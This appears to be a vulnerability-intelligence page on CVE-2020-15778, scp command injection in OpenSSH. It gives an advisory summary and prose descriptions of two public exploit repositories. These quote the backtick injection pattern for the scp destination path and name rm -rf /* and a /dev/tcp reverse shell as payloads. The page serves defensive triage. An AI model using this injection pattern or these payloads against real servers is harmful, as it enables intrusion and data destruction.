CVE-2020-15778 is a command injection issue in scp in OpenSSH through 8.3p1. The flaw is in scp.c, specifically the toremote function, where insufficient sanitization of the destination argument can allow shell metacharacters to be interpreted unexpectedly. Public descriptions note exploitation via backtick characters in the destination argument, enabling unintended command execution in the context of an scp transfer. The issue has been publicly described as disputed because the vendor reportedly stated that validation of anomalous argument transfers was intentionally omitted due to compatibility concerns with existing workflows.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
This repository is a minimal Docker-based reproduction of CVE-2020-15778 (OpenSSH scp command injection via crafted remote path). It contains four files: a README with step-by-step exploitation instructions and two Dockerfiles that build a vulnerable lab environment. Structure/purpose: - server/Dockerfile: Builds an Ubuntu 20.04 container running openssh-server (pinned to 1:8.2p1-4ubuntu0.9), enables root password login, sets root password to "PASSWORD", adjusts PAM, exposes TCP/22, and runs sshd in the foreground. - client/Dockerfile: Builds an Ubuntu 20.04 container with openssh-client (same pinned version) and netcat, dropping into /bin/bash for interactive use. - README.md: Describes how to build/run both containers, obtain their internal Docker IPs, and exploit the vulnerability by embedding backtick-delimited shell commands in the scp destination path (e.g., root@<server_ip>:'`<cmd>`/tmp'). It provides example payloads including destructive deletion and a reverse shell using bash redirected to /dev/tcp and a netcat listener. Exploit capabilities: - Authenticated remote command execution on the scp server by injecting shell commands into the remote path argument. - Demonstrated post-exploitation actions: filesystem destruction (rm -rf /*) and interactive shell callback to the client (reverse shell). No standalone exploit script is included; exploitation is performed manually using the scp client inside the provided containerized environment, making this a proof-of-concept reproduction rather than a weaponized tool.
This repository contains two Python exploit scripts (CVE-2020-15778.py and CVE-2020-15778-Update.py) targeting CVE-2020-15778, a command injection vulnerability in OpenSSH's scp utility. Both scripts automate the exploitation process by generating a bash reverse shell payload, writing it to a file (shell.sh), and using scp to transfer it to the /tmp directory of the target system. The exploit then triggers execution of the payload via a crafted scp command, resulting in a reverse shell connection from the target to the attacker's machine (as specified by lhost and lport). The 'Update' version adds a host status check using nmap before attempting exploitation. The README provides usage instructions and example commands. The exploit requires valid SSH credentials (root access) and a netcat listener on the attacker's machine. The repository is operational and provides a working exploit for the specified vulnerability.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.